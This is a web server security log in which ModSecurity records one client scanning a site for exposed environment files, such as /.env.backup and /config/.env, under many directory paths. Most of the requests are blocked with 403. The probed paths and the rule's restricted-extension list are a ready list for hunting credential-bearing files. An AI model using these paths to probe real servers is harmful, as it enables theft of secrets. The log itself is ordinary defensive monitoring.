[Sat Nov 29 10:52:00.735429 2025] [:error] [pid 398575] [client 3.8.164.39:36104] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.backup"] [unique_id "aSrCQPf8q--fJYmSMAuGHwAAAAk"]
[Sat Nov 29 10:52:00.735445 2025] [:error] [pid 398278] [client 3.8.164.39:36106] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.staging"] [unique_id "aSrCQA31ShYAI8brU4C5AQAAAAA"]
[Sat Nov 29 10:52:01.014826 2025] [:error] [pid 400370] [client 3.8.164.39:36110] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSrCQZjgO8e606QOJFsQbwAAAA8"]
[Sat Nov 29 10:52:01.015141 2025] [:error] [pid 400370] [client 3.8.164.39:36110] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSrCQZjgO8e606QOJFsQbwAAAA8"]
[Sat Nov 29 10:52:01.015378 2025] [:error] [pid 400370] [client 3.8.164.39:36110] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.sample"] [unique_id "aSrCQZjgO8e606QOJFsQbwAAAA8"]
[Sat Nov 29 10:52:01.017623 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSrCQXHF7XN8-DkqegVy5wAAAAQ"]
[Sat Nov 29 10:52:01.017798 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSrCQXHF7XN8-DkqegVy5wAAAAQ"]
[Sat Nov 29 10:52:01.018027 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSrCQXHF7XN8-DkqegVy5wAAAAQ"]
[Sat Nov 29 10:52:01.018200 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.old"] [unique_id "aSrCQXHF7XN8-DkqegVy5wAAAAQ"]
[Sat Nov 29 10:52:01.945420 2025] [:error] [pid 406026] [client 3.8.164.39:36240] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSrCQfjYkbMMdOAsqSytAQAAAAU"]
[Sat Nov 29 10:52:01.945703 2025] [:error] [pid 406026] [client 3.8.164.39:36240] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSrCQfjYkbMMdOAsqSytAQAAAAU"]
[Sat Nov 29 10:52:01.945910 2025] [:error] [pid 406026] [client 3.8.164.39:36240] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env.save"] [unique_id "aSrCQfjYkbMMdOAsqSytAQAAAAU"]
[Sat Nov 29 10:52:02.350851 2025] [authz_core:error] [pid 406027] [client 3.8.164.39:36242] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Sat Nov 29 10:52:02.497903 2025] [authz_core:error] [pid 406029] [client 3.8.164.39:36450] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Sat Nov 29 10:52:02.972672 2025] [:error] [pid 406030] [client 3.8.164.39:36642] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSrCQiL65K9QU0RcLELg3QAAAA4"]
[Sat Nov 29 10:52:02.972936 2025] [:error] [pid 406030] [client 3.8.164.39:36642] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSrCQiL65K9QU0RcLELg3QAAAA4"]
[Sat Nov 29 10:52:02.973122 2025] [:error] [pid 406030] [client 3.8.164.39:36642] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/lab/.env"] [unique_id "aSrCQiL65K9QU0RcLELg3QAAAA4"]
[Sat Nov 29 10:52:03.491088 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSrCQxuHESEEqrci5wSNlQAAAAw"]
[Sat Nov 29 10:52:03.491347 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSrCQxuHESEEqrci5wSNlQAAAAw"]
[Sat Nov 29 10:52:03.491558 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cronlab/.env"] [unique_id "aSrCQxuHESEEqrci5wSNlQAAAAw"]
[Sat Nov 29 10:52:03.655163 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /assets/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSrCQ3HF7XN8-DkqegVy6AAAAAQ"]
[Sat Nov 29 10:52:03.655417 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSrCQ3HF7XN8-DkqegVy6AAAAAQ"]
[Sat Nov 29 10:52:03.655629 2025] [:error] [pid 406024] [client 3.8.164.39:36108] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/assets/.env"] [unique_id "aSrCQ3HF7XN8-DkqegVy6AAAAAQ"]
[Sat Nov 29 10:52:03.658524 2025] [:error] [pid 406031] [client 3.8.164.39:37084] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSrCQxUEgj-zQYRtE3jaowAAABA"]
[Sat Nov 29 10:52:03.658784 2025] [:error] [pid 406031] [client 3.8.164.39:37084] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSrCQxUEgj-zQYRtE3jaowAAABA"]
[Sat Nov 29 10:52:03.658996 2025] [:error] [pid 406031] [client 3.8.164.39:37084] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aSrCQxUEgj-zQYRtE3jaowAAABA"]
[Sat Nov 29 10:52:04.431698 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSrCRFw-ljF8z8u_ETMg8AAAAA0"]
[Sat Nov 29 10:52:04.433062 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSrCRFw-ljF8z8u_ETMg8AAAAA0"]
[Sat Nov 29 10:52:04.433236 2025] [:error] [pid 406029] [client 3.8.164.39:36450] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/apps/.env"] [unique_id "aSrCRFw-ljF8z8u_ETMg8AAAAA0"]
[Sat Nov 29 10:52:04.616434 2025] [:error] [pid 406036] [client 3.8.164.39:38222] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/datavase/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSrCRJ8Kig3lTRZUBxYh9AAAABE"]
[Sat Nov 29 10:52:04.616694 2025] [:error] [pid 406036] [client 3.8.164.39:38222] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSrCRJ8Kig3lTRZUBxYh9AAAABE"]
[Sat Nov 29 10:52:04.616897 2025] [:error] [pid 406036] [client 3.8.164.39:38222] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/Datavase/.env"] [unique_id "aSrCRJ8Kig3lTRZUBxYh9AAAABE"]
[Sat Nov 29 10:52:05.055782 2025] [:error] [pid 406037] [client 3.8.164.39:38442] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /database/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSrCRaRpktJQu-PTU4MzHQAAABI"]
[Sat Nov 29 10:52:05.056054 2025] [:error] [pid 406037] [client 3.8.164.39:38442] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSrCRaRpktJQu-PTU4MzHQAAABI"]
[Sat Nov 29 10:52:05.056060 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlgAAAAw"]
[Sat Nov 29 10:52:05.056234 2025] [:error] [pid 406037] [client 3.8.164.39:38442] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.env"] [unique_id "aSrCRaRpktJQu-PTU4MzHQAAABI"]
[Sat Nov 29 10:52:05.056241 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlgAAAAw"]
[Sat Nov 29 10:52:05.056409 2025] [:error] [pid 406028] [client 3.8.164.39:36736] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/sitemaps/.env"] [unique_id "aSrCRRuHESEEqrci5wSNlgAAAAw"]
[Sat Nov 29 10:52:05.234999 2025] [:error] [pid 406038] [client 3.8.164.39:38600] [client 3.8.164.39] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSrCRfMxldqlX_ckD8X2YgAAABM"]
[Sat Nov 29 10:52:05.235260 2025] [:error] [pid 406038] [client 3.8.164.39:38600] [client 3.8.164.39] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSrCRfMxldqlX_ckD8X2YgAAABM"]
[Sat Nov 29 10:52:05.235482 2025] [:error] [pid 406038] [client 3.8.164.39:38600] [client 3.8.164.39] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/.env"] [unique_id "aSrCRfMxldqlX_ckD8X2YgAAABM"]
